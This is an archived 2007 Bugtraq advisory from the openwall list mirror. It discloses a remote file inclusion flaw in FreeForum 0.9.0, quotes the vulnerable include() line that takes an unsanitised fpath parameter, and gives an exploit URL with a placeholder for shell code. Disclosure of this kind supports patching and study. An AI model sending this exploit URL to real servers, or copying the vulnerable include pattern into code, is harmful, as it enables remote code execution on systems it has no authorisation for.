lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <BAY20-F8333DA7AE4A23638D8280BFAF0@phx.gbl>
Date: Sun, 21 Jan 2007 13:18:51 +0000
From: "me you" <r.5.7@...mail.com>
To: submit@...w0rm.com
Cc: bugtraq@...urityfocus.com
Subject: FreeForum 0.9.0 <=- (index.php fpath) Remote File Include Vulnerability 

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

FreeForum 0.9.0 <=- (index.php fpath) Remote File Include Vulnerability

Script: FreeForum

Version: 0.9.0

URL: http://www.phpfreaks.com/scripts.php?action=gotoDownload&script_id=616

Found By : BorN To K!LL

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Bug in : index.php

code :
include("$fpath/forum.php");

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Explo!T :.
^^^^^
/index.php?fpath=[SHe1L-CoDe]

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

GreeTz To :.

Dr.2  ,  Asbmay  ,  General C  ,  ToOoFa  ,  ThE-LoRd-Of-CrAcKiNg  ,  SHiKaA 
  ,  str0ke

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

_________________________________________________________________
The MSN Entertainment Guide to Golden Globes is here.  Get all the scoop. 
http://tv.msn.com/tv/globes2007/?icid=nctagline2

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ